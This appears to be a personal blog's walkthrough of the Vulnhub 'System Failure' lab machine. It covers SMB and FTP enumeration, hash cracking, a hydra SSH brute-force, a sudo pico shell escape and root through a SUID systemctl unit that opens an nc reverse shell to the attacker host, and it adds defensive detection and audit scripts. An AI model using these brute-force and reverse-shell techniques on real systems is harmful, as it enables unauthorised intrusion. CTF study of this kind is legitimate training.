Windy's little blog

All the odds and ends of life, and I like CTF.

Vulnhub System Failure Walkthrough

https://www.vulnhub.com/entry/system-failure-1,654/


Scan ports.

# Nmap 7.91 scan initiated Thu Mar 11 21:49:07 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.80
Nmap scan report for 192.168.56.80
Host is up (0.014s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 bb:02:d1:ee:91:11:fe:a0:b7:90:e6:e0:07:49:95:85 (RSA)
|   256 ef:e6:04:30:01:50:07:5d:2d:17:99:d1:00:3d:f2:d6 (ECDSA)
|_  256 80:7f:c5:96:0e:3d:66:b9:d6:a8:6f:59:fa:ca:86:36 (ED25519)
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: SYSTEMFAILURE; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumerate the SMB shares, download the file "share", and check its content.

┌──(kali㉿mykali)-[~]
└─$ smbclient -L 192.168.56.80         
Enter WORKGROUP\kali's password: 
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      open
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available

┌──(kali㉿mykali)-[~]
└─$ smbclient //192.168.56.80/anonymous 
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Dec 18 05:25:14 2020
  ..                                  D        0  Wed Dec 16 22:58:53 2020
  share                               N      220  Fri Dec 18 05:25:14 2020
                7205476 blocks of size 1024. 5406288 blocks available
smb: \> get share
getting file \share of size 220 as share (9.8 KiloBytes/sec) (average 9.8 KiloBytes/sec)
smb: \> quit

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ cat share                 
Guys, I left you access only here to give you my shared file, you have little time, I leave you the login credentials inside for FTP you will find some info, you have to hurry!

89492D216D0A212F8ED54FC5AC9D340B

Admin


Also, through SMB (RID cycling with enum4linux), we can get four user names.

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ enum4linux -a 192.168.56.80              
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 12 22:35:43 2021
...
 ======================================================================== 
|    Users on 192.168.56.80 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-992311547-1957423116-3284270811
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\valex (Local User)
S-1-22-1-1001 Unix User\admin (Local User)
S-1-22-1-1002 Unix User\jin (Local User)
S-1-22-1-1003 Unix User\superadmin (Local User)
...


Crack the hash.

[image: 图片.png]


Log in to FTP as "admin" with the cracked password and download here.txt.

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ ftp 192.168.56.80                                                                                                                                                                                          130 ⨯
Connected to 192.168.56.80.
220 (vsFTPd 3.0.3)
Name (192.168.56.80:kali): admin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Interesting
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Secr3t
drwxr-xr-x    3 0        0            4096 Dec 20 05:25 Syst3m
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Useful
ftp> cd Syst3m
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Dec 20 05:25 .
drwxr-xr-x    8 1001     1001         4096 Dec 24 10:33 ..
drwxr-xr-x    2 0        0           36864 Dec 20 05:30 F4iluR3
-rw-r--r--    1 0        0              89 Dec 20 05:17 here.txt
226 Directory send OK.


Check here.txt.

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ cat here.txt  
(I l3f7 y0u 0ur s3cr3t c0d3)+(I l3f7 17 ju57 f0r y0u)+(t0 m4k3)x(7h1ng5 s4f3r.)
-Admin

The F4iluR3 folder holds about 1000 files; turn off interactive mode (prompt off) and download them all with mget.

ftp> prompt off
Interactive mode off.
ftp> mget *
local: file.txt remote: file.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for file.txt (1696 bytes).
226 Transfer complete.
1696 bytes received in 0.00 secs (5.1841 MB/s)
local: file0001.txt remote: file0001.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for file0001.txt (1696 bytes).
226 Transfer complete.
...

List the files sorted by size: only one differs from the others. Check its content and find the odd string.

┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ ls -laSr...
-rw-r--r-- 1 kali kali  1696 Mar 12 22:44 file0002.txt
-rw-r--r-- 1 kali kali  1696 Mar 12 22:44 file0001.txt
-rw-r--r-- 1 kali kali  1714 Mar 12 22:46 file0189.txt
drwxr-xr-x 6 kali kali 32768 Mar 12 22:46 ..
drwxr-xr-x 2 kali kali 32768 Mar 12 22:46 .

┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ cat file0189.txt 
Systems Failure is a role-playing game written by Bill Coffin and published by Palladium Books in July 1999.The fictional premise for the game is that during the "Millennium bug" scare, 
actual "Bugs" appeared. They are energy beings from beyond Earth (whether another dimension or another planet is not clear) that invaded at the end of 1999, leaving a post-apocalyptic 
world in their wake. The Bugs feed on energy and are capable of transmitting themselves through modern power transmission and phone lines.The Bugs come in several varieties. There are 
the drone-like Army Ants who have only basic intelligence, the more intelligent Assassin Bugs who can replicate human speech, though imperfectly, and the flying Lightning Bugs, amongst 
others. All of them are able to turn themselves into energy or rapidly call up reinforcements. In addition to these, there are "brain bugs", a variety that can invade human minds and 
turn them into zombie-like servants of the Bugs.Players take the part of survivors of this invasion ten years after it occurred. Some groups, such as survival-oriented militias, were 
well-prepared for something to go wrong and so form the nuclei of stable societies and resistance to the Bugs. Military units have converged on NORAD which is using genetic engineering 
to create new weapons that the Bugs cannot gain control of, and to create super-soldiers-J310MIYla1aVUaSV-, both those that have psionic powers and those who have been mutated into 
insect-like supermen using Bug DNA. In addition, there are people who have been driven mad by the stress, those who have joined gangs and seek to exploit others, and those who trade 
their skills as mechanics, medics, scientists, or merchants.


Decode the string with base62.

[image: 图片.png]
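A small Python helper, added here and not part of the original post, that automates the two steps above: it finds the file whose size differs from the rest, pulls dash-wrapped tokens that mix letters and digits out of it, and decodes base62. The alphabet order (digits, upper case, lower case), the token heuristic and the constructed sample directory are assumptions; other base62 tools may use a different alphabet, so the decoded bytes can differ from the screenshot.

```python
import os
import re
import string
import tempfile
from collections import Counter

# Alphabet assumed here: digits, upper-case, then lower-case letters.
# Other base62 tools order the alphabet differently, so decode output may vary.
B62 = string.digits + string.ascii_uppercase + string.ascii_lowercase

def base62_decode(s: str) -> bytes:
    """Read s as a big-endian base-62 integer and return its bytes."""
    n = 0
    for ch in s:
        n = n * 62 + B62.index(ch)
    return n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""

def base62_encode(data: bytes) -> str:
    """Inverse of base62_decode; used here to build round-trip test input."""
    n, out = int.from_bytes(data, "big"), ""
    while n:
        n, r = divmod(n, 62)
        out = B62[r] + out
    return out or "0"

def odd_files_by_size(directory: str) -> list:
    """Paths whose size differs from the most common size in the directory."""
    sizes = {f: os.path.getsize(os.path.join(directory, f))
             for f in os.listdir(directory)
             if os.path.isfile(os.path.join(directory, f))}
    common = Counter(sizes.values()).most_common(1)[0][0]
    return sorted(os.path.join(directory, f) for f, sz in sizes.items() if sz != common)

def hidden_tokens(path: str) -> list:
    """Dash-wrapped alphanumeric runs that mix letters and digits, as in the post."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        runs = re.findall(r"(?<=-)[A-Za-z0-9]{8,}(?=-)", fh.read())
    return [t for t in runs if any(c.isdigit() for c in t) and any(c.isalpha() for c in t)]

def build_sample_dir(n: int = 5) -> str:
    """Constructed stand-in for F4iluR3: n identical filler files plus one with a token."""
    d = tempfile.mkdtemp()
    filler = "Systems Failure is a role-playing game published in July 1999. " * 10
    for i in range(n):
        with open(os.path.join(d, f"file{i:04d}.txt"), "w") as fh:
            fh.write(filler)
    with open(os.path.join(d, "file0189.txt"), "w") as fh:
        fh.write(filler.replace("game", "super-soldiers-J310MIYla1aVUaSV-game", 1))
    return d
```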


Check http://192.168.56.80/area4/Sup3rS3cR37/System/, which holds two files. useful.txt looks like a password dictionary.

┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ curl http://192.168.56.80/area4/Sup3rS3cR37/System/note.txt
Guys, I left something here for you, I know your skills well, we must try to hurry. Not always everything goes the right way.
-Admin
┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ curl http://192.168.56.80/area4/Sup3rS3cR37/System/useful.txt                                                                                                                                           
andres
courtney
booboo
kissme
harley
ronaldo
...


Brute-force SSH with the user names enumerated from SMB and the useful.txt dictionary. Note the hint in note.txt, the "right" way: reversed login names, so set "-e r" in hydra (the run below uses "-e nsr", which also tries a null password and the login name itself).

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ hydra -L names.txt -P useful.txt  -e nsr 192.168.56.80 ssh -t 32        
...
[DATA] attacking ssh://192.168.56.80:22/
[STATUS] 283.00 tries/min, 283 tries in 00:01h, 782 to do in 00:03h, 32 active
[22][ssh] host: 192.168.56.80   login: valex   password: ...
1 of 1 target successfully completed, 1 valid password found
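The defender's view of the same activity, as an added example that is not from the post: a detector over constructed sshd auth.log lines that flags a source trying many user names in a short window and records whether that source later logged in successfully. The line format, thresholds and sample lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Syslog-style sshd lines as Debian writes them to /var/log/auth.log (assumed format).
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<what>Failed password|Accepted password) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$")

def parse(lines, year=2021):
    """Yield (timestamp, failed?, user, source ip) for every sshd auth line."""
    for line in lines:
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["what"].startswith("Failed"), m["user"], m["ip"]

def brute_force_sources(lines, window_s=60, max_failures=10, min_users=3):
    """Source IPs with >= max_failures failures over >= min_users names inside
    window_s seconds, plus any later successful login from that source."""
    events = defaultdict(list)
    for ts, failed, user, ip in parse(lines):
        events[ip].append((ts, failed, user))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [(ts, user) for ts, failed, user in evs if failed]
        for i, (t0, _) in enumerate(fails):
            span = [u for ts, u in fails[i:] if (ts - t0).total_seconds() <= window_s]
            if len(span) >= max_failures and len(set(span)) >= min_users:
                success = [u for ts, failed, u in evs if not failed and ts >= t0]
                alerts[ip] = {"failures": len(fails), "users": sorted(set(span)),
                              "later_success_as": success}
                break
    return alerts

# Constructed sample: a spray of the enumerated names from one host, a valid login
# from the same host afterwards, and one unrelated typo from another host.
SAMPLE = [f"Mar 12 23:01:{s:02d} SystemFailure sshd[1{s:03d}]: Failed password for {u} "
          f"from 192.168.56.150 port {40000 + s} ssh2"
          for s, u in enumerate(["admin", "jin", "superadmin", "valex"] * 3)]
SAMPLE += ["Mar 12 23:01:20 SystemFailure sshd[1999]: Accepted password for valex from 192.168.56.150 port 40099 ssh2",
           "Mar 12 23:05:00 SystemFailure sshd[2100]: Failed password for invalid user test from 192.168.56.10 port 50000 ssh2"]
```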

SSH in as valex and check the sudo rules.

valex@SystemFailure:~$ sudo -l
sudo: unable to resolve host SystemFailure: Temporary failure in name resolution
Matching Defaults entries for valex on SystemFailure:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User valex may run the following commands on SystemFailure:
    (jin) NOPASSWD: /usr/bin/pico


Run /usr/bin/pico through sudo as jin; it is nano under another name. Since nano can run a command from inside the editor (^R then ^X), we can escalate to user jin.

pico
^R^X
reset; sh 1>&0 2>&0

As user jin, look for SUID binaries.

jin@SystemFailure:~$ find / -perm -u=s 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/umount
/usr/bin/systemctl
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn

Get root through the SUID systemctl.

jin@SystemFailure:~$ echo '[Service]
> Type=oneshot
> ExecStart=nc 192.168.56.150 2234 -e /bin/bash
> [Install]
> WantedBy=multi-user.target' > $TF
jin@SystemFailure:~$ /usr/bin/systemctl  link $TF
Created symlink /etc/systemd/system/tmp.noEJj88ESX.service → /tmp/tmp.noEJj88ESX.service.
jin@SystemFailure:~$ /usr/bin/systemctl  enable --now $TF
Created symlink /etc/systemd/system/multi-user.target.wants/tmp.noEJj88ESX.service → /tmp/tmp.noEJj88ESX.service.
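A defender-side audit for the two misconfigurations this box relies on, added as an example and not taken from the post: the sudo rule that lets valex run an editor as jin, and the set-uid bit on systemctl that a stock Debian install does not have. The baseline set (built from the post's own find output minus systemctl), the list of shell-capable programs and the sudo -l parser are assumptions.

```python
import re

# Assumed baseline: set-uid files on a stock Debian 10 install, taken from the
# post's own find output minus the planted one. Regenerate it from a clean host.
DEBIAN10_SUID_BASELINE = {
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/gpasswd", "/usr/bin/passwd", "/usr/bin/su",
    "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
}
# Programs that can start another program from inside themselves, so a sudo rule
# on them is as broad as a rule on a shell. Illustrative; extend from your policy.
SHELL_CAPABLE = {"pico", "nano", "vi", "vim", "systemctl"}

# One "(runas) TAG: cmd, cmd" line of `sudo -l` output.
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def unexpected_suid(find_output: str, baseline=DEBIAN10_SUID_BASELINE) -> list:
    """Paths from `find / -perm -u=s` output that are not in the baseline."""
    paths = (p.strip() for p in find_output.splitlines())
    return sorted(p for p in paths if p and p not in baseline)

def risky_sudo_rules(sudo_l_output: str) -> list:
    """(runas, tags, command) for every rule whose command can spawn a shell."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or prog in SHELL_CAPABLE:
                findings.append((m["runas"], m["tags"].strip(), cmd))
    return findings

# Constructed samples, copied from the post's sudo -l and find output.
SUDO_L_SAMPLE = """Matching Defaults entries for valex on SystemFailure:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User valex may run the following commands on SystemFailure:
    (jin) NOPASSWD: /usr/bin/pico
"""
FIND_SAMPLE = "\n".join(sorted(DEBIAN10_SUID_BASELINE | {"/usr/bin/systemctl"}))
```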


Catch the reverse shell on the listener and check the root flag.

listening on [any] 2234 ...
connect to [192.168.56.150] from (UNKNOWN) [192.168.56.80] 42672
cd /root
ls
root.txt
id;hostname;cat root.txt
uid=0(root) gid=0(root) groups=0(root)
SystemFailure
If you are reading this flag, without being rooted, it is not valid. You must enter after send me a picture you entered jin, and tag me. Good luck.

